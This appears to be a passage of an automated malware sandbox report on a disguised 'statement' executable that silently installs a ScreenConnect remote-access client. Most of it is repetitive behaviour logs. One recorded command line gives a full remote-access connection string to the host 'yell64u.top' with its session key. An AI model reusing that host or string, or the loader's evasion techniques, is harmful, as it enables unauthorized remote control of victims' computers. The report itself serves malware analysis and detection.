                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeMemory allocated: 2A90000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeMemory allocated: 4AF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeMemory allocated: 6330000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeMemory allocated: 5AC0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeMemory allocated: 7330000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeMemory allocated: 8330000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeMemory allocated: 6330000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeMemory allocated: 85C0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeMemory allocated: 95C0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 14E0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 34E0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1110000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1AE90000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 16D0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1B170000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI367A.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3417.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Users\user\Desktop\sstatment.exe TID: 888Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe TID: 7292Thread sleep count: 48 > 30Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe TID: 7448Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: ScreenConnect.ClientService.exe, 00000007.00000002.2974558303.0000000004A00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                              Source: setup.msi.0.drBinary or memory string: VMCi-
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: 0.2.sstatment.exe.5050000.0.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                              Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: C:\Users\user\Desktop\sstatment.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"Jump to behavior
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.clientservice.exe" "?e=access&y=guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=bgiaaackaabsu0exaagaaaeaaqdfk%2fbbpi2y%2fu64inmnualvsinhikj3qixef2eblhktkmb9wafgho8pwjl0lvyg9kgvgb%2fbbr7p8upybqqwjmt2zg9vyagxlcjy%2fd8w0%2b7tfbgg8gffcjoob3tupnzbetnvs8%2bybotmzzsmg6ijynblxj1gtcahumwr1u8jkfxsyvpzrxohbr31dmibtzi1nunryf8xa6qxsktbm1h0aqgbzr6fzuzymqekrjktwq2%2fxup3dlz4en6bz1k0onlkviz5vhj3h597ijpgkjlbhftfc4t%2btt%2bncv6zqw83iwwtzxibtxf7nmuvq0n4ff2lkmh5flu07mqw%2fy38%2b5mo41xa&c=php&c=&c=sales&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
